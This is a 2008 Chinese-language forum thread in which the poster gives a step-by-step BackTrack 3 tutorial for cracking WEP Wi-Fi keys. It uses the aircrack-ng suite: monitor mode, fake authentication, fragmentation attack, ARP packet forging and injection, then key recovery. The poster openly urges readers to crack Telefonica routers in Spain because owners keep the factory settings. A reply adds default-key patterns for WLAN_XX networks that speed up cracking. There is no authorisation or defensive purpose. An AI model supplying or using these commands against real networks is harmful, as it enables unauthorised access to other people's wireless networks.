西班牙华人网 西华论坛

 找回密码
 立即注册
搜索
查看: 1343|回复: 33
收起左侧

无线破解之-WEP破解

[复制链接]
发表于 2008-3-8 14:07:17 | 显示全部楼层 |阅读模式
                 BT3下破解无客户端wep简明教程(图文版)

1.接上篇教程,下载半 安装(或刻盘)BT3后,在BT3下直接破解无客户端。现教程奉上.
2.启动BT3,打开一个窗口,输入ifconfig a 查看网卡  (顺便记下自己网卡的mac,后面要用到)

   我的网卡是rausb0


   再输入ifconfig a rausb0加载usb网卡驱动


3.
输入airmon-ng
start rausb0
6
激活网卡的Monitor模式


后面的6 是你要破解ap 的工作频道
根据实际,换成你破解的ap的实际工作频道(下同)

4.输入抓包命令,抓包并查看你要破解的apessid
mac

   输入命令
airodump-ng --ivs -w name -c 6 rausb0
,其中,rausb0是你破解用的网卡接口名(下同),这样,你的窗口将显示一个工作站,可以看到你要破解的apessid mac ,并记下apessid mac


5.上面窗口不关闭,另开一个窗口,输入命令,用自己的网卡连接要破解的ap

       输入
aireplay-ng -1 0 -e ap
essid -a apmac -h 自己网卡的mac rausb0

       这时,系统将回显

Sending Authentication Request


Authentication successful



Sending Association Request
Association successful :-)



6
.输入aireplay-ng
-5 -b ap
mac -h 自己网卡的mac rausb0
来获得xor文件



如果一切顺利,系统将回显
Use this packet ?



输入y
回车,将得到一个至关重要的xor文件。

再输入ls
查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。


7.输入packetforge-ng -0 -a apmac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment -××××-××××.xor -w mrarp
其中,–l中的lL的小写,别和1混淆,而其中的××××-××××.xor 是你刚才生成的文件名。


系统回显:Wrote packet to: mrarp
 楼主| 发表于 2008-3-8 14:13:26 | 显示全部楼层
8.输入aireplay-ng -2 r mrarp
-x 1024 rausb0
,发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,我选择的是1024


                               
登录/注册后可看大图


输入y
回车
攻击开始


                               
登录/注册后可看大图

这时,前面的抓包窗口上的data将迅速增加。

到数据增加到3万以上时,另开窗口,启动

aircrack-ng -n 64 -b ap
mac name-01.ivs

其中
64
64位密码,如果是128位,换成128即可。



完成, 以上~~ 即 WEP密码~~          有事可到俺的 Blog逛逛, 新东东俺都会往上面贴: www.axisgroup.com.cn/blog/

另~~  如有可能请到俺朋友的坛子逛逛, 坛子刚建, 需要 您的"热情"!


[ 本帖最后由 zxy 于 2008-3-8 14:01 编辑 ]
回复 支持 反对

使用道具 举报

发表于 2008-3-8 14:23:47 | 显示全部楼层
完啦,我的帖子卖不动了。我改成free的吧,呵呵
回复 支持 反对

使用道具 举报

发表于 2008-3-8 15:05:46 | 显示全部楼层
这么麻烦 幸亏没买啊 买了也 浪费啊
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-3-8 15:13:58 | 显示全部楼层
WEP破解,非常简单~~ 一个WEP, 至多1小时 即可破解, 至于 WAP 就得看运气了~~  不过 西班牙, Telefonica的 路由器 出厂密码  全都内置WEP~~~  而老外基本上都不改这玩意....  故~~  楼上的 不学学, N亏的说!
回复 支持 反对

使用道具 举报

发表于 2008-3-9 02:20:15 | 显示全部楼层
看不懂的说
回复 支持 反对

使用道具 举报

发表于 2008-3-9 07:41:41 | 显示全部楼层
免费的一定要顶~!!
另外2楼的帖怎么删了?
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-3-10 10:32:06 | 显示全部楼层
:)  楼上的, 有钱人!
回复 支持 反对

使用道具 举报

发表于 2008-3-10 20:26:56 | 显示全部楼层
telefonica的WEP有一定的规律,我破过好几个~
西班牙人也出了好几个LIVECD
比如WIFIWAY和WIFISLAX~
最近破解的人都用BT3~
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-3-10 23:01:35 | 显示全部楼层
规律跟 Telefonica Router WEP 根本就拉不上关系~~  要是能根据规律破~~ 大家何必辛苦抓包?   西班牙所谓的 LiveCD??  你指的是 www.telefonica.net 这个网站上的东东,还是... ?
回复 支持 反对

使用道具 举报

发表于 2008-3-10 23:38:48 | 显示全部楼层
有西班牙网站专门介绍 SSID 为 WLAN_XX的默认密码(不是西班牙人都是电脑盲,一直使用默认密码),西语好的同学可以去搜搜看,我是看不懂的。

另,楼主,你帖子里的BT3也是Live CD中的一种(基于Linuxn内核无需安装的光盘启动操作系统)
回复 支持 反对

使用道具 举报

发表于 2008-3-11 10:46:13 | 显示全部楼层
原帖由 zxy 于 2008-3-10 22:01 发表
规律跟 Telefonica Router WEP 根本就拉不上关系~~  要是能根据规律破~~ 大家何必辛苦抓包?   西班牙所谓的 LiveCD??  你指的是 www.telefonica.net 这个网站上的东东,还是... ? ...

楼主此言差矣~
有规律的WEP加密可以促使WEP加速破解~~
我破过的几个WLAN_开头的,基本都是X开头,加MAC的前6位,再加4位随机数字和字母,最后两位是SSID,比如WLAN_A1,最后两位就是A1~
这样,就可以用少量的包去破WEP了~~~
楼主懂了吗~
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-3-11 11:30:34 | 显示全部楼层
回~nobestname, 贴子里用的是 LiveCD, 但自己用的是 USB + 八木+linksys wusb54g~~
另~~传说中的谁
请问您所说的规律,试问 就算清楚该规律,用BT3或其他 不还是得抓包,"至多"一个只需抓1万~3万,一个得3万以上.  在信号够强的情况下,且支持注入. 攻击抓包 1万个数据包大概只需2~3分钟,而信号垃圾, 你抓1000都得NN分钟. 难不成 楼上的, 您的水平已高至可以写 内核,或是 PHP脚本?
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-3-11 11:31:31 | 显示全部楼层
另~~  忘说个事了~~ :)  俺破的 Telefonica的 都是以 Z打头的~~     :)  这就是所谓的 规律?
回复 支持 反对

使用道具 举报

发表于 2008-3-11 12:04:52 | 显示全部楼层
不同批次的都有不同字母开头的~
我是说我所碰到的大部分的都是X开头的~
我所说的规律就象你所说的~
假设一个WEP密码需要30W个包~
而那个路由信号不是很好,一天只能抓1W个包~
如果有这条规律来寻找,可能只要5W个包,只需要5天的时间来抓~
而不是30天~~
破解更多在于寻找便捷的方式~
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-3-11 12:14:31 | 显示全部楼层
汗~~  WEP 如果花上几天的时间 才能破解~~~~  俺对这玩意 是没啥兴趣的!!
必定 实用的技术才是 最好的~~    就跟以前的BT2一样~~ 俺花了 三天时间占用了女友的电脑 破了个WEP, 女友差点没把俺给 蹂躏死~~!  
这也是 为何BT2问世已有两年, 但 普及不高~~ BT3一露像 全世界都知道的原因!! :)  玩笑之言:)
回复 支持 反对

使用道具 举报

发表于 2008-3-11 12:16:06 | 显示全部楼层
看来楼主只把它当作一中生活中的工具~
而不是当它是一中知识拿来研究~
那么我也没有继续讨论下去的意义了~
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-3-11 12:19:42 | 显示全部楼层
传说中的谁~~   您是哪个公司的?  交个朋友, 在西 电脑水平 能达到一定层次的华人不多的说!!
鄙人~~  现 就职于 XXXXX, 您呢?

[ 本帖最后由 zxy 于 2008-3-11 13:34 编辑 ]
回复 支持 反对

使用道具 举报

 楼主| 发表于 2008-3-11 12:25:04 | 显示全部楼层
另~~  传说中的谁, 如有兴趣交流,  可换个话题, 必定 WEP破解 现已是 地球人都知道的事!!
回复 支持 反对

使用道具 举报

发表于 2008-3-11 12:27:47 | 显示全部楼层
我曾经在青田卖了3年的电脑~
现在在马德里做照相馆工作~
出来已经有一年多咯~~
有兴趣的话加我QQ 4704390吧~
这边对电脑有兴趣的人实在很少~
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关于我们|广告服务|免责声明|小黑屋|友情链接|Archiver|联系我们|手机版|西班牙华人网 西华论坛 ( 蜀ICP备05006459号 )

GMT+2, 2024-11-26 20:32 , Processed in 0.013338 second(s), 9 queries , Gzip On, Redis On.

Powered by Discuz! X3.4 Licensed

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表
手机版